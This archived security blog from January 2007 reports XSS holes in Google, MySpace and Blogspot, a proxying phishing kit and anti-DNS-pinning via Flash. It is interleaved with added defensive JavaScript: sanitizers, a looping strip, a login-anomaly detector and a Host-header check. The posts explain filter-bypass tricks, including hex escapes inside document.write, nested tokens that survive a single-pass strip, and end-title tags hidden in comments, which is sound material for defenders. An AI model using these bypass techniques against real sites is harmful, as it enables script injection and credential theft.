web application security lab

Archive for January, 2007

Search Status SEO Detector

Monday, January 15th, 2007

I know I haven’t done many SEO posts lately, but one of my co-workers is leaving (who specializes in SEO) and I thought I’d pay him a little tribute. I spent a few minutes throwing up another tool into my vulnerability lab that detects the SEO Firefox plugin - Search Status. In particular it helps detect if they are attempting to find rel=nofollow put on links. That’s important for SEO folks because they know which pages will give them higher page rank if they put a link on the page.

Search Status has a function to enable highlighting of nofollow tags, which is highly useful for improving page rank (knowing where and where not to post if you are interested in backlinks on web-boards for instance). This will help ferret out those pesky SEO experts and either deliver them different content or change the links to remove the rel=nofollow modifications so they aren’t visible. A cute trick based off of Jeremiah’s CSS hack (which I also put back up online in the lab).

Yet another XSS hole in Google

Monday, January 15th, 2007

At 12:57 this morning Hong posted a working exploit in Google based on some work he did on the 13th, finding another XSS vulnerability in Google. This one is a little more interesting than most, because it relies on a basic misunderstanding of what can be done inside document.write. Google’s engineers were smart enough to close off the obvious quotes and angle brackets, but because the text is inside a document.write you can use JavaScript escape characters to build a string that the browser then writes out as the markup in question. Here is an example PoC:

As you can see, the \x represents a hex character. So basically pretend that you are going to URL encode something and then do a replace: anytime you see “%” replace it with “\x”. In this way no angle brackets, no quotes, no equals signs, nor any other character except a backslash and alphanumerics are required for the vector to fire. Pretty tricky stuff, especially since most people don’t understand what can be done inside a document.write, including Google’s developers. Nice find, Hong, and a nice demonstration of what is possible inside a document.write. Time to protect yourself from backslashes too, I’d say.
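To make the point concrete, here is an added example (my own model, not Google’s code or Hong’s PoC) of why filtering quotes and angle brackets is not enough once untrusted text lands inside a document.write string literal: the JavaScript engine decodes \xNN escapes before the result is ever parsed as HTML. The filter functions, the sample string and the decoding helper are all assumptions constructed for the illustration; the hardened filter HTML-encodes markup characters first and then escapes the characters that matter inside a JS string literal (backslash, quotes, line terminators).

```javascript
// Added example: filtering before document.write(). Not code from the post.

// Model of the flawed filter described above: it drops quotes and angle
// brackets but passes backslashes through untouched.
function naiveFilter(untrusted) {
  return untrusted.replace(/["'<>]/g, '');
}

// Model of what the browser does with the filtered text: it sits inside a
// JS string literal, document.write("..."), so the JS engine decodes escape
// sequences such as \x3c BEFORE the result is parsed as HTML. We let the
// engine do the decoding, exactly as the page's inline script would.
function decodeAsJsStringLiteral(literalBody) {
  return new Function('return "' + literalBody + '";')();
}

// Hardened filter: HTML-encode markup characters so the decoded string can
// never contain a tag, then JS-escape backslashes, quotes and line
// terminators so no escape sequence can be smuggled in and the literal
// cannot be closed early.
function hardenedFilter(untrusted) {
  const htmlEncoded = untrusted
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
  return htmlEncoded
    .replace(/\\/g, '\\\\')
    .replace(/\r/g, '\\r')
    .replace(/\n/g, '\\n')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Does the text that reaches the HTML parser still contain angle brackets?
function containsMarkup(s) {
  return /[<>]/.test(s);
}

// Constructed sample input: hex escapes instead of literal angle brackets,
// so the naive filter has nothing to remove.
const SAMPLE = '\\x3cb\\x3ehi\\x3c/b\\x3e';

// Runs both filters through the same decode step and reports what the HTML
// parser would actually see in each case.
function demo(input = SAMPLE) {
  const naive = decodeAsJsStringLiteral(naiveFilter(input));
  const hardened = decodeAsJsStringLiteral(hardenedFilter(input));
  return {
    naive,
    hardened,
    naiveHasMarkup: containsMarkup(naive),
    hardenedHasMarkup: containsMarkup(hardened),
  };
}

console.log(demo());
```

With the naive filter the decoded text is `<b>hi</b>`, real markup built from nothing but backslashes and alphanumerics; with the hardened filter the backslashes are doubled, so the decoded text is the harmless literal `\x3cb\x3ehi\x3c/b\x3e`. The order matters: HTML-encode for the final context first, then escape for the JavaScript string the text travels through.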

Surfing the Web Can Make You a Sex Offender

Sunday, January 14th, 2007

This is a really upsetting story about how a teenager was infected by a trojan, used as a fileserver for child pornography, and then faced prosecution as a sex offender. The sex offender charge was based off of a plea after he admitted to showing other teenaged boys a Playboy magazine. The circumstances are so ridiculous it’s just painful to read. The gist is the boy went to visit a porn site that infected his computer, and then the police detected the computer uploading child pornography.

I was asked after being sent this if having a firewall and anti-virus is enough to protect your computer. Unfortunately the answer is no. Let’s think about session riding for a second. It is trivial to get any user to download images from any website that doesn’t protect itself with a simple IMG tag. In this way a user can visit an otherwise benign site, and be forced to download child pornography or perform attacks on servers or whatever the attacker wants by proxy. Very scary.

MySpace 0day Again^6

Friday, January 12th, 2007

This is just painful to write. Again today, digi7al64 found another non-alpha-non-digit XSS hole in MySpace. This is number 6, folks. SIX times MySpace has failed to fix this issue. I will admit, they did make it harder, from what I can tell; as of yesterday a lot more filters were put in place that appeared to fix the issue, but alas, they still haven’t taken the single piece of advice that will set them free… use a while loop! Maybe I should clarify: I don’t mean use it sometimes, I mean use it whenever you strip. And even then I don’t recommend stripping at all, but if you have to, you absolutely must use a while loop.

I’m not even going to bother trying to write out digi7al64’s XSS vector, you can click the link above to see it yourself, but the gist is that they strip out xsrc=… in certain contexts, and then don’t iterate over the text again to ensure that the data they stripped didn’t cause another vector to surface. If it isn’t clear to anyone yet, here’s the basic idea of this issue. Let’s say the word “TED” is bad. We hate TED today. Now, let’s say I put in the word TETEDD. After stripping, the text looks like TE[stripped]D, which re-creates the word we were trying to stop in the first place.

MySpace continues to have this problem over and over because they don’t loop over the text to try to find the same strings they were initially trying to block again. If they did they would find the malicious string and strip it again (then iterate again and so on). Painful.
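Here is the while-loop advice in code, as an added example of my own (it is not MySpace’s filter, and the blocked token and helper names are constructed for the illustration). It shows a single-pass strip reassembling the blocked word from the post’s TETEDD example, the same strip repeated until nothing changes, and the alternative the post actually prefers: rejecting the input instead of stripping it.

```javascript
// Added example: one-pass strip vs. strip-until-stable vs. reject.
// Constructed illustration, not the site's real filter.

// One pass: removes every non-overlapping occurrence present right now, but
// never looks at what the removals left behind. "TETEDD" -> "TED".
function stripOnce(text, blocked) {
  return text.split(blocked).join('');
}

// Looping strip: repeat until a pass changes nothing. Every pass that changes
// the text makes it shorter, so the loop always terminates.
function stripUntilStable(text, blocked) {
  let current = text;
  while (true) {
    const next = stripOnce(current, blocked);
    if (next === current) return current;
    current = next;
  }
}

// The post's own recommendation is not to strip at all: rejecting is easier
// to reason about because nothing is left behind to re-assemble.
function rejectIfBlocked(text, blocked) {
  if (text.includes(blocked)) {
    throw new Error('input contains blocked token');
  }
  return text;
}

// Side-by-side result for one input, so the difference is visible.
function compare(text, blocked) {
  let rejected = false;
  try {
    rejectIfBlocked(text, blocked);
  } catch (e) {
    rejected = true;
  }
  return {
    once: stripOnce(text, blocked),
    looped: stripUntilStable(text, blocked),
    rejected,
  };
}

console.log(compare('TETEDD', 'TED'));     // once: "TED", looped: "", rejected: true
console.log(compare('TETETEDDD', 'TED'));  // once: "TETEDD", looped: "", rejected: true
console.log(compare('safe text', 'TED'));  // unchanged, not rejected
```

Note that `split(...).join('')` already removes every occurrence it can see in one pass; the nested case still survives it, which is exactly why the loop (or outright rejection) is needed rather than a "remove all" call.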

Phishing Kits Now Act as MITM

Friday, January 12th, 2007

Thanks to Mark for sending this over: there is a new phishing kit that acts as a man in the middle. According to the article the phishing kit simply acts as a PHP proxy that forwards every request straight through to the real site. That way it can capture anything you are typing and defeat systems like SiteKey that require that you see the image in question.

I can’t exactly say this is a major leap forward, because I’ve seen phishing sites with similar levels of sophistication that automatically detect whether the username/password was correct by checking in real time. However, this does represent a new variant that could render a lot of the more snake-oil security products virtually useless. The one major disadvantage of this system is that it has to reside on a host, and if the same IP is used over and over and over, that could set off a lot of alarms. Interesting nonetheless.
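The "same IP over and over" weakness is something the real site can look for. The following is an added detection example of my own (not from the article or the kit): it parses constructed login log lines and flags any source IP that authenticates several distinct accounts within a short window, which is what a proxying kit on one host looks like from the server side. The log format, field names, thresholds and IP addresses are all assumptions.

```javascript
// Added example: flag source IPs that log in as many different users in a
// short window. Log format and data are constructed for the illustration.

// Constructed sample log lines (not real data).
const SAMPLE_LOG = `
2007-01-12T10:00:01Z login ok user=alice ip=203.0.113.7
2007-01-12T10:00:09Z login ok user=bob ip=203.0.113.7
2007-01-12T10:00:40Z login ok user=carol ip=203.0.113.7
2007-01-12T10:01:02Z login ok user=dave ip=203.0.113.7
2007-01-12T10:01:30Z login ok user=erin ip=198.51.100.4
2007-01-12T10:05:00Z login fail user=frank ip=203.0.113.7
2007-01-12T11:30:00Z login ok user=grace ip=203.0.113.7
`;

// Parse one event per line; lines that do not match the assumed format are
// skipped rather than crashing the job.
function parseLogins(text) {
  const re = /^(\S+) login (ok|fail) user=(\S+) ip=(\S+)$/;
  return text
    .split('\n')
    .map((l) => l.trim())
    .filter(Boolean)
    .map((line) => {
      const m = re.exec(line);
      if (!m) return null;
      return { ts: Date.parse(m[1]), ok: m[2] === 'ok', user: m[3], ip: m[4] };
    })
    .filter(Boolean);
}

// For each IP, slide a window over its successful logins and record the
// largest number of distinct users seen inside any one window. IPs reaching
// the threshold are reported with that count.
function findSharedSourceIps(events, { windowMs = 10 * 60 * 1000, threshold = 3 } = {}) {
  const byIp = new Map();
  for (const e of events) {
    if (!e.ok) continue;              // failed attempts are a different signal
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const flagged = [];
  for (const [ip, evs] of byIp) {
    evs.sort((a, b) => a.ts - b.ts);
    let best = 0;
    for (let i = 0; i < evs.length; i++) {
      const users = new Set();
      for (let j = i; j < evs.length && evs[j].ts - evs[i].ts <= windowMs; j++) {
        users.add(evs[j].user);
      }
      best = Math.max(best, users.size);
    }
    if (best >= threshold) flagged.push({ ip, distinctUsers: best });
  }
  return flagged;
}

console.log(findSharedSourceIps(parseLogins(SAMPLE_LOG)));
// [ { ip: '203.0.113.7', distinctUsers: 4 } ]
```

Treat a hit as a triage signal rather than proof: a corporate NAT gateway or a shared proxy produces the same shape, so the next step is to compare the flagged IP against known egress addresses and look at what those sessions did after login.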

Google Indexes XSS on FBI.gov

Friday, January 12th, 2007

Today another thread started on sla.ckers.org discussing how Google has continued to index working XSS exploits. This might not sound like news because I’ve discussed it before. This time it’s different. eyeced pointed out that this time Google has indexed not just any XSS but XSS in FBI’s website.

Last time Cory from Google said, flippantly, “Is XSS not part of ‘all the world’s information?’ ;)” and to that I responded, “if that were the case, then you’d bring back all the currently disabled Google dorks, no?” (He did not respond - big surprise).

I would expect this to vanish quickly, but the point is the same. If someone can search for an XSS exploit so easily, or be inadvertently taken to a valid looking URL that actually performs an XSS attack, that makes Google’s search results far more dangerous to consumers. They cannot trust that the page they are visiting will be benign, even if it is on a trustworthy domain (like FBI.gov). If the exploit had been loaded with a keyword that someone not looking for an attack vector might have searched for this could be easily used to phish, steal credentials or worse in a very believable way. Ouch.

Anti-DNS Pinning in Flash (and Maybe Java)

Friday, January 12th, 2007

Kanatoko published yet another way to do Anti-DNS pinning and port scanning using Flash and potentially Java as well. This is scary for two reasons. First, the anti-DNS pinning trick (the obvious one) and second is the fact that Flash can now read raw sockets. This means Flash just got a lot more powerful. It can read any binary output and interact with it. Does anyone else think this is as scary as I do?

There is a writeup at Adobe’s site on the 9.x socket functionality of the Flash player. I haven’t heard about anyone exploiting this until today (nor had I ever heard about the socket functionality until now, either). But I am guessing this will spark a new wave of security holes now that you have read access to the ports that the user’s browser has access to (the most interesting of which are on the Intranet). It also paves the way for a lot more interesting IP security related hacks. Crazy times, and nice work, Kanatoko!
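One defence an intranet HTTP service can apply on its own against anti-DNS pinning is to refuse requests whose Host header is not one of the names it is actually known by: after the rebinding step the client connects to the internal address, but the request still carries the attacker’s hostname. The following is an added example of my own (not Kanatoko’s or Adobe’s code); the allow-list names, the request objects and the function names are assumptions. It only helps services that speak HTTP; a raw-socket service, which is what makes the Flash finding interesting, has no Host header to check and needs network-level controls instead.

```javascript
// Added example: Host-header allow-list for an intranet HTTP service.
// Names and requests below are constructed for the illustration.

// Hostnames this service is legitimately reachable by (assumed).
const ALLOWED_HOSTS = new Set(['intranet.example.internal', 'localhost']);

// Accept only an exact, case-insensitive match against the allow-list.
// An optional :port suffix is removed first; bracketed IPv6 literals keep
// their colons because the split happens only after the closing bracket.
function hostHeaderAllowed(hostHeader, allowed = ALLOWED_HOSTS) {
  if (typeof hostHeader !== 'string' || hostHeader.trim().length === 0) return false;
  let name = hostHeader.trim().toLowerCase();
  const bracket = name.lastIndexOf(']');
  const colon = name.lastIndexOf(':');
  if (colon > bracket) name = name.slice(0, colon);
  return allowed.has(name);
}

// Decision for a whole request: a rebound request arrives with the
// attacker-controlled name in Host even though the TCP connection landed
// on our internal address, so it is refused before any handler runs.
function gateRequest(req) {
  const host = req.headers && req.headers.host;
  if (!hostHeaderAllowed(host)) {
    return { status: 421, reason: 'Host header not recognised: ' + String(host) };
  }
  return { status: 200, reason: 'ok' };
}

// Constructed requests: a normal one and one that arrived via a rebound name.
const SAMPLE_REQUESTS = [
  { headers: { host: 'intranet.example.internal:8080' } },
  { headers: { host: 'rebound.attacker.example' } },   // constructed hostname
  { headers: { host: '10.0.0.5' } },
  { headers: {} },
];

function gateAll(requests = SAMPLE_REQUESTS) {
  return requests.map(gateRequest);
}

console.log(gateAll());
```

Checking the literal IP address is deliberately not enough to pass: a browser that was rebound will present the attacker’s name, and a client that types the raw address can be given the canonical name instead.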

Blogspot XSS For Safari

Thursday, January 11th, 2007

I got an email today from Jose Avila about an XSS hole in BlogSpot. For anyone who doesn’t know, Blogspot is a free blogging system for people who can’t or don’t want to host their own. Anyway, his blog post discusses how the exploit works. Essentially Blogspot considers anything inside of comment tags to be safe. So he encapsulates his vector which closes the title tag and starts a remote script include inside of comment tags.

The demo PoC page is located here and works only in Safari (and possibly Konqueror, although that is unverified), as Internet Explorer and Firefox treat an end title tag inside of a comment tag as part of the title instead of ending the title. Weird, huh? The vector is the truly noteworthy part of this, even though the site itself is very popular. Anything inside of comment tags, even if that includes an end title tag, is treated as part of the title. Bizarre behavior, but it proves that you can’t assume that things inside of comment tags are okay (as the downlevel hidden XSS vector showed us as well). Nice find, Jose!
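The lesson that comment tags are not a safe zone translates into a simple rule for a title field: remove comments entirely before anything else, then encode what remains. Below is an added example of my own (not Blogspot’s code); the function names and the sample titles are constructed. It treats an unterminated comment as swallowing the rest of the input, so nothing after a stray `<!--` can reach the page either.

```javascript
// Added example: a title sanitizer that refuses to trust HTML comments.
// Constructed illustration, not the site's real filter.

// Remove every <!-- ... --> block. An unterminated comment (no closing -->)
// would otherwise swallow the rest of the document in the browser, so the
// remainder is dropped here for the same reason. The odd "<!-->" form is
// treated as unterminated as well, which errs on the side of removal.
function stripHtmlComments(text) {
  let out = '';
  let i = 0;
  while (i < text.length) {
    const start = text.indexOf('<!--', i);
    if (start === -1) {
      out += text.slice(i);
      break;
    }
    out += text.slice(i, start);
    const end = text.indexOf('-->', start + 4);
    if (end === -1) break;          // unterminated: drop everything after <!--
    i = end + 3;
  }
  return out;
}

// Encode the characters that could start or end markup once the text is
// placed in the page.
function htmlEncode(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Titles are text, not markup: strip comments first so nothing inside them
// survives, then encode whatever is left so it cannot close the <title>
// element no matter how a particular browser parses comments.
function sanitizeTitle(untrusted) {
  return htmlEncode(stripHtmlComments(untrusted)).trim();
}

function renderTitleTag(untrusted) {
  return '<title>' + sanitizeTitle(untrusted) + '</title>';
}

// Constructed inputs: a comment wrapping an end-title tag, a bare end-title
// tag, and an unterminated comment.
console.log(renderTitleTag('My post <!-- </title><b>x</b> -->'));
console.log(renderTitleTag('a </title> b'));
console.log(renderTitleTag('hello <!-- </title>'));
```

Encoding after stripping (rather than only stripping) is what makes the result independent of browser quirks: even if a parser somewhere did treat a comment boundary differently, the output contains no raw `<` or `>` for it to act on.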

RSACon and WASC Meetup

Thursday, January 11th, 2007

Whelp, it’s that time of year again. Time for vendors to show us what they are made of, and for us to punch holes in everything they worked on all year. No, but seriously, I try to make it a point to get to every RSACon I can. Vendors have a lot of interesting things to say, even if I tend to find lots of issues. Also the people walking the floor incognito tend to be pretty interesting security folk. Not to mention the real reason I want to go, which is the WASC (web application security consortium) meetup:

Place: Jillian’s (walking distance from the conference), 101 4th Street, Suite 170, San Francisco, CA 94103. Phone: 415.369.6100.
Time: Wed, Feb. 7 @ 12:30pm.
I’m actually only going for one day (that day) just for the meet and greet. Yup, it’s worth it.

If you’ve never gone to a WASC meetup think of it as the Web application luncheon meet and greet. Unlike the OWASP meetings there’s not a lot of tech-talk, but usually 20 or so good people and you get to meet the people behind the names face to face. If you happen to be at RSACon on Wednesday, check it out. Let Jeremiah know if you plan on making it, so he can make the right sized reservations. If you can’t, don’t worry, I’ll probably blog about it when I get back.

VMware is finally free

Thursday, January 11th, 2007

I’m not a huge fan of virtualization in production environments (it feels an awful lot like putting all your eggs in one basket and slowing everything down in the process) but you cannot beat it for testing. Today I found out that VMware Server is now free for download. Their major upsell is service contracts and add-ons, but if you don’t tend to use those, or need it only for testing, and you run Windows but want to run other operating systems or perform potentially dangerous tests, this is the software for you.

If you’ve never played with VMware before you’re missing out. You can boot from an ISO or install your own OS into what is essentially a large file that represents the computer’s disk. That computer can be copied too. So if you want to run a dangerous test, you copy the file, boot it, install your dangerous software, run it, perform your tests, then shut it down and delete it without worry, since it never touched your real drive or your original image. Perfect! If you’ve got an extra copy of a distro lying around that you never got to play with and didn’t feel like repartitioning a drive, this is definitely the software for you.